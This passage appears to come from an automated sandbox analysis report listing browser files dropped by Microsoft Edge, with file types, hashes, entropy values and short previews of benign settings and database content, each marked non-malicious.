                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.576 14d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:01:22.579 14d0 Recovering log #3.2024/12/27-01:01:22.582 14d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):144
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                                  MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                                  SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                                  SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                                  SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):144
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                                  MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                                  SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                                  SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                                  SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.231758134470151
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:Bcq4Iv4YebvqBZFUt8UcK/+UcxI5LYebvqBaJ:3464Yebvyg8BSLYebvL
                                                                                                                                                                                                                                                                                                  MD5:F6E8B80416976ACFDFC6D52B522435A4
                                                                                                                                                                                                                                                                                                  SHA1:6E4E1E749FC5D0FCF81367C0084CE5E9BA21524F
                                                                                                                                                                                                                                                                                                  SHA-256:353F8ECD4B5E5F2DD81647705EDEC62BBB1F65EEF463597490DD134E752C1148
                                                                                                                                                                                                                                                                                                  SHA-512:A2C91032722BD7C020ECED7278255635E35C2F7BB65B83632AF454EC4F2E55DF272FC43D3EAEF958485906607222F5A4BF6E8A2A5A4A19DB3C38A71C78FA5645
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:40.168 1158 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-01:01:40.169 1158 Recovering log #3.2024/12/27-01:01:40.172 1158 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.191959556105143
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XtHyq2P923oH+TcwtpIFUt8U4XcX1Zmw+U4XcBRkwO923oH+Tcwta/WLJ:BoHyv4YebmFUt8Ut/+U5R5LYebaUJ
                                                                                                                                                                                                                                                                                                  MD5:92452C0DDBBCEC4A7FEC5290BE055CDB
                                                                                                                                                                                                                                                                                                  SHA1:805DED956F0223D23AC47FDC2C5E7DD98B31E62E
                                                                                                                                                                                                                                                                                                  SHA-256:103CEB20ECECF149ABFFDF9D865EDB059FA7049ABED91C47B30E086D367E534B
                                                                                                                                                                                                                                                                                                  SHA-512:CF4F55C1725D7DF9A8E6E973CAA0F833E5B3DC6C0ECF77774849F6B710C09F5B84328612DF908A36427DE6173F7B488A5C58EC6B332C00F7EB80CDCEA29D204C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.492 1850 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-01:01:21.576 1850 Recovering log #3.2024/12/27-01:01:21.576 1850 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2651687888907042
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVumC:Bq+n0JX9ELyKOMq+8y9/OwJ
                                                                                                                                                                                                                                                                                                  MD5:2B05CFE22E737A971DE04FE241744685
                                                                                                                                                                                                                                                                                                  SHA1:5919FD449C43D46E797597A1C44457132922CE7F
                                                                                                                                                                                                                                                                                                  SHA-256:F218242FB3AF771DDB378225CDC9C2406631CB08A1C579912ECB887045AD802D
                                                                                                                                                                                                                                                                                                  SHA-512:B7291935B265EF0E88243BA7992544BA2FF6490882F4268AB5CFB3030563C41B4E44242DB351CB957CB8E5AA85B9E7365B2F316B30B4EAD9D342B3968538361D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4664027299543818
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBBUS:v7doKsKuKZKlZNmu46yjxP
                                                                                                                                                                                                                                                                                                  MD5:4E3F1454E92EFA1C63BF8652B7855CFA
                                                                                                                                                                                                                                                                                                  SHA1:23C4311D9C5D6D3BDD56DB554FBC6E011C306FC4
                                                                                                                                                                                                                                                                                                  SHA-256:ACBC62418F7AD244B0C1B2393203796ACCAF6E01067ABA970080BB03938E5040
                                                                                                                                                                                                                                                                                                  SHA-512:C7F47BF561DA68FD3E875B2062BC32091D9D0C5D399A9CAA86882918A2B31F2BCA73F64E7AF4BC4ABBBCB474EFA543BD0BAF240DEE0F9C3E005FB39C0DF26725
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.1350540537034711
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):38627
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.55456231766999
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):11755
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):25012
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.5672700036123866
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379752881481832","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379752881481832","location":5,"ma
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17789), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):17791
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.487790762964317
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379752882058560","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.10257140747202309
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:Gu0Hrn20Hr489XCChslotGLNl0ml/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/Vl/VS:+HTHUspEjVl/PnnnnnnnnnnnvoQ/Eou
                                                                                                                                                                                                                                                                                                  MD5:3FF09DD6E7541F8EE2AD5577F2B6A262
                                                                                                                                                                                                                                                                                                  SHA1:80F82D809B8452CD45BC86BDA3CC24C99C988867
                                                                                                                                                                                                                                                                                                  SHA-256:58E6B78CBF558A311EE5BDC36BA2C91F0BFEF5714E3959464F91CC270913FF02
                                                                                                                                                                                                                                                                                                  SHA-512:05B3E5A76C7CD8B1A1CE23FFFBD5EC6D706358F495A3745583510F345C3DFAC4B73A41FDCAF49BFB9BEAD5E6E87674001187E51D7A3055484EE431720FDDC7CF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):317272
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8870563588727385
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:G2DHdxpxi99tJLaJzmiaQg1CaZywLYaS5n9adDNOaH7Wb1aaxjv8psyRyH+yTyR/:AZbHHxQ80c+Xi
                                                                                                                                                                                                                                                                                                  MD5:EF109FE95B5F79E7BF9EF0174B8A53DE
                                                                                                                                                                                                                                                                                                  SHA1:27353E393E9F260FA282AD5BD7F18EDFAC17BC89
                                                                                                                                                                                                                                                                                                  SHA-256:62FD09AC733405F3019BFD018A2B1960715D6FF24CBE8D3F56C6D996DA7A7B90
                                                                                                                                                                                                                                                                                                  SHA-512:ABABE841F108FFFE954943AFC1B7C6E54900A88D2650EFE5CEA86DA20870E12C01219D644F933B0208818FA1F735A69163B45B4893116C82EB3F70267C5099BC
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):694
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.556837182207769
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:Wlc8NOuuuuuuuuuuuuuuuuuuuuuUllnNNq8N:iDql3V
                                                                                                                                                                                                                                                                                                  MD5:2A77C3054EA00C41709E7D4740628EA1
                                                                                                                                                                                                                                                                                                  SHA1:E982CC09C7B279CA621E9345F71FFD94761EE1D5
                                                                                                                                                                                                                                                                                                  SHA-256:E80830434237466DE6AA4F9E667EBA99C4789DE6FA497688BF85266483FE07D2
